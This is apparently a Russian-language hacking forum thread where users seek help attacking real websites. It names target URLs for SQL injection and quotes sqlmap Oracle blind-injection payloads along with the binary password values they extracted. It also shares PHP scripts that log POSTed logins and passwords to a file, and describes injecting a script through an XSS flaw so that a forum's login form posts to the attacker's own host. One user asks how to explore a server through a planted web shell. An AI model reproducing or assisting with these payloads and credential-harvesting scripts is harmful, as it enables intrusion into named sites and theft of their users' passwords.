Вы что то с запросом сделать пытаетесь или это у вас просто страничка с ошибкой? ссылочку бы показали
Havj не инжектить . Пробовал раскручивать,выдаёт ту же самую ссылку . Вот собственно сама ссылочка metravib.acoemgroup.com/application.php?id=3&idm=20&ida=34 1 Blind Injection . MYSQL Injection . Ссылка : www.muziekcentrum.be/carrier.php?id=8333 . Как это раскрутить ? Помогите . error'овые,не?
Помогите пжл,как сохранять запрос Code: $fd = fopen($file,"a"); … fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']); … fclose($fd); …
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
итак, ищем в гугле "IIRF.ini" в первых 6 результатах видим: вывод - IIS. ищем "iis configuration file" находим: http://stackoverflow.com/questions/8635884/iis7-settings-file-locations
Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость Place: GET Parameter: SL Type: boolean-based blind Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) Type: AND/OR time-based blind Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE) Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(97)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа: \x1c\x1f\x17\x18\x0ev\x1fjt\x15} Притом это не на одном сайте, а на всех сайтах этой платформы. Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!! UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее: 157E02680F7F 1B0C130E197B620B7316 131E091001 171E0A0B057F620C7E12 00051D00087D6B087F17 171D1C0D0B676A08711D 0A00011F0A076F0F07600B0A Что это за хеши такие? Oracle(DES)? или...? есть идеи? PS можно платно
Почему у меня ничего не записывает php? ------------------------------------------------------------------------------------------------------------ <? var $url = ""; $ls_username = $_POST['ls_username']; $ls_password = $_POST['ls_password']; if($('ls_username').value == '' || $('ls_password').value == '') { $data = "E-mail: $ls_username \n PAss: $ls_password"; $filename = "base.txt"; $fd = fopen( $filename, "w+" ); fputs( $fd, $data ); fclose( $fd ); } header("location: $url"); ?> ------------------------------------------------------------------------------------------------------------ Вставляю этот скрипт ------------------------------------------------------------------------------------------------------------ <script>document.lsform.action=‘http://hosting.ru/base.php’</script> ------------------------------------------------------------------------------------------------------------ в страницу где форма ------------------------------------------------------------------------------------------------------------ <form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes" onsubmit="return lsSubmit();"> ------------------------------------------------------------------------------------------------------------ И ничего не происходит,в чем может быть проблема?
Code: $url = ""; $ls_username = $_POST['ls_username']; $ls_password = $_POST['ls_password']; if ($ls_username != null){ if ($ls_password != null) { $open=fopen('base.txt',"a"); fwrite($open,"$ls_username;$ls_password\n"); fclose($open); } }
Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?
Почему когда вставляю код ( <script>document.getElementById('lsform').action="http://МойХостинг1.ru/base.php?";</script>) на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php) и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php?") Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?